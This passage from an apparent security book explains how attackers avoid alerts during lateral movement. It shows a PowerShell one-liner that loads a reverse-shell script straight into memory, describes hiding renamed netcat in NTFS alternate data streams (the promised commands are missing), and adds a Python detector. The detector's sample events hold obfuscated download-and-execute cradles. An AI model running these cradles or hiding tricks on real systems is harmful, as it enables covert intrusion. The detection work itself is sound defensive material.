Avoiding alerts

The attacker needs to avoid raising alarms at this stage. If network administrators detect that there is a threat on the network, they will thoroughly sweep through it and thwart any progress the attacker has made. Many organizations spend a substantial amount of money on security systems to catch attackers. Security tools are becoming increasingly effective, and they can identify many signatures of the hacking tools and malware that attackers have been using. Attackers therefore have to act wisely. There has been a trend of attackers using legitimate tools for lateral movement. These are tools and techniques that are known to the system, or that belong to the system, and therefore do not generally pose a threat. Security systems therefore ignore them because they are legitimate. Such tools and techniques have enabled attackers to move around in highly secured networks right under the noses of security systems.

The following is an example of how attackers can avoid detection by using PowerShell. Instead of downloading a file to disk, where it would be scanned by the target's antivirus system, PowerShell is used to load a PS1 file directly from the internet rather than downloading it first and then loading it:

PS > IEX (New-Object Net.WebClient).DownloadString('http:///Invoke-PowerShellTcp.ps1')

Such a command prevents the file that is being downloaded from being flagged by antivirus programs. Attackers can also take advantage of alternate data streams (ADS) in the Windows NT file system (NTFS) to avoid alerts. By using ADS, attackers can hide their files inside legitimate system files, which can be a great strategy for moving between systems. The following command forks Netcat (https://github.com/diegocr/netcat) into a valid Windows utility called Calculator (calc.exe) and changes the filename (nc.exe) to svchost.exe. This way the process name won't raise any flags, since it is part of the system:

If you simply use the dir command to list all files in this folder, you won't see the file. However, if you use the streams tool from Sysinternals, you will be able to see the entire name as follows:
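The PowerShell download cradle shown above never writes the script to disk, but PowerShell Script Block Logging (Event ID 4104) still records the command that ran, so a defender can look for the fetch-plus-execute pattern there. The following Python detector is an added example, not code from the book: it scans constructed 4104-style records (the event ids, hostnames and script text are all made up), expands -EncodedCommand payloads and strips backtick obfuscation before matching, and only flags records that combine a remote fetch with in-memory execution.

```python
import base64
import re

# Indicators for in-memory "download cradle" behaviour: something that fetches
# remote content, combined with something that executes it without touching disk.
FETCH_PATTERNS = [r"net\.webclient", r"downloadstring", r"invoke-webrequest",
                  r"invoke-restmethod", r"start-bitstransfer"]
EXEC_PATTERNS = [r"\biex\b", r"invoke-expression", r"\[scriptblock\]::create"]
# -EncodedCommand and its short forms, followed by a base64 blob.
ENCODED_RE = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)


def encode_command(cmd: str) -> str:
    """Produce the -EncodedCommand form PowerShell accepts (base64 of UTF-16LE)."""
    return base64.b64encode(cmd.encode("utf-16le")).decode("ascii")


# Constructed sample 4104-style records; hostnames are placeholders, not real telemetry.
SAMPLE_EVENTS = [
    {"id": 1, "script": "Get-ChildItem C:\\Users | Sort-Object LastWriteTime"},
    {"id": 2, "script": "IEX (New-Object Net.WebClient).DownloadString("
                        "'http://example.invalid/Invoke-PowerShellTcp.ps1')"},
    {"id": 3, "script": "powershell.exe -NoP -enc " + encode_command(
        "Invo`ke-Expression (New-Object Net.WebClient).DownloadString('http://example.invalid/x.ps1')")},
    {"id": 4, "script": "Invoke-WebRequest -Uri https://example.invalid/report.csv -OutFile C:\\tmp\\r.csv"},
]


def normalize(script: str) -> str:
    """Expand encoded payloads, strip backtick escapes used for obfuscation, case-fold."""
    for blob in ENCODED_RE.findall(script):
        try:
            script += " " + base64.b64decode(blob).decode("utf-16le", errors="ignore")
        except ValueError:  # binascii.Error is a ValueError subclass
            pass
    return script.replace("`", "").lower()


def classify(script: str) -> dict:
    """Report which fetch/exec indicators a script block contains and whether they form a cradle."""
    text = normalize(script)
    fetch = [p for p in FETCH_PATTERNS if re.search(p, text)]
    execute = [p for p in EXEC_PATTERNS if re.search(p, text)]
    return {"fetch": fetch, "exec": execute, "cradle": bool(fetch and execute),
            "encoded": ENCODED_RE.search(script) is not None}


def scan(events: list) -> dict:
    """Map event id -> findings for every record that looks like a download cradle."""
    findings = {e["id"]: classify(e["script"]) for e in events}
    return {eid: f for eid, f in findings.items() if f["cradle"]}
```

Running scan(SAMPLE_EVENTS) flags records 2 and 3 only; the plain directory listing and the Invoke-WebRequest that saves to a file (where antivirus gets its chance to scan) are left alone.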
